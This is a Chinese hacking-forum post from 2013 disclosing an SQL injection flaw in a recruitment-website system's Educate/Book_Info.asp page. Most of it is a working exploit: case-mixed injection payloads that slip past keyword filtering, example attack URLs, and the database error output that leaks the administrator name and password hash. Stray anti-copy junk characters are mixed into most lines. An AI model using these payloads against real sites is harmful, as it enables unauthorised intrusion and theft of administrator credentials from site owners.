找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2252|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp ; k2 u# v. g/ }5 f- z

' `! |" I% y( ]- F1 W* T此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
4 F$ t. N! L7 W6 l! t
/ }6 G, d3 q9 |! Rexp:如下% c7 e, z- o) ~7 B% P9 G0 Y3 z
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper). Q7 ], M( P5 @7 X
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)$ p2 g  x% @5 h0 C7 Y* z
/ s- |2 w3 t+ t/ [
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
# L4 w# x+ L% E( r3 e
. y) L" r6 l: Q4 }Microsoft OLE DB Provider for SQL Server 错误 '80040e07'& r5 E- r- V/ Y4 ]- [  I9 W
8 W: ?- j1 @' Z& n) h3 ^
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
& T! F+ h! J, d0 a " ]: N: L9 t: o5 a
/Educate/Book_Info.asp,行 8
+ r3 b; F# f* o% h6 Y
" \) V3 V" r1 e$ }& X1 zhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ U  q2 }6 m' `( l7 ?. x' o/ i( y ; ], A% q% \1 G: Q
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'6 \) l! w1 V% t/ \$ ]+ ^

9 F/ c: |4 P6 V" a$ X" b将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。8 K0 [0 ^3 W+ }9 B; B

5 j1 R% d- k: ]: j: p- u3 d) o/Educate/Book_Info.asp,行 8
0 \/ [9 y" r" ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表